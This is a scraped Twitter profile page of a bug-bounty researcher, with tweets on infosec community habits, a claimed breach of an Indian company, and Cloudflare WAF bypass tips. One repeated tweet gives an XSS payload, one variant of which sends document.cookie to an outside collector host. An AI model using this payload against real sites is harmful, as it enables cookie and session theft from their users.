N$ (@nav1n0x) 's Twitter Profile
N$

@nav1n0x

Github: github.com/ifconfig-me

ID: 230499169

linkhttps://nav1n.medium.com calendar_today25-12-2010 19:27:37

2,2K Tweet

25,25K Followers

249 Following

N$ (@nav1n0x) 's Twitter Profile Photo

Whatโ€™s most valuable from a community member? Choose honestly โ€” what really earns your respect in the infosec community? Iโ€™m asking because Iโ€™ve noticed a steep decline in knowledge sharing lately. Many seniors have stopped posting . Why do you think that is? #BugBounty

N$ (@nav1n0x) 's Twitter Profile Photo

This is a great tip for bypassing Cloudflare for SQLi/XSS etc. I recently tweeted something similar, where I managed to bypass a Cloudflare 403 bycombining multiple payloads, hope this helps ๐Ÿ‘‡ x.com/nav1n0x/statusโ€ฆ

N$ (@nav1n0x) 's Twitter Profile Photo

A hacker claims to have breached an Indian nuclear and chemical company and is selling over 80 databases containing employee details, locations, critical infrastructure information, and more in the darkweb market place... CERT-In CyberDost I4C NCIIPC India Anshul Saxena

N$ (@nav1n0x) 's Twitter Profile Photo

I'm a very early Twitter user. I have two accounts โ€” one is personal and somewhat business-related, created 18 years ago and registered in July 2007. The other account this was registered in December 2010. Now don't guess my age ๐Ÿ˜‚๐Ÿ˜‚

I'm a very early Twitter user. I have two accounts โ€” one is personal and somewhat business-related, created 18 years ago and registered in July 2007. The other account this was registered in December 2010. Now don't guess my age ๐Ÿ˜‚๐Ÿ˜‚
N$ (@nav1n0x) 's Twitter Profile Photo

This payload bypasses Cloudflare waf in certain cases: "top[8680439..toString(30)](document.domain)" or "top[8680439..toString(30)](new%20Image().src%3D%27https://xxx.oastify.com/log?cookie%3D%27%2Bdocument.cookie)" #BugBounty

This payload bypasses Cloudflare waf in certain cases: "top[8680439..toString(30)](document.domain)" or "top[8680439..toString(30)](new%20Image().src%3D%27https://xxx.oastify.com/log?cookie%3D%27%2Bdocument.cookie)" #BugBounty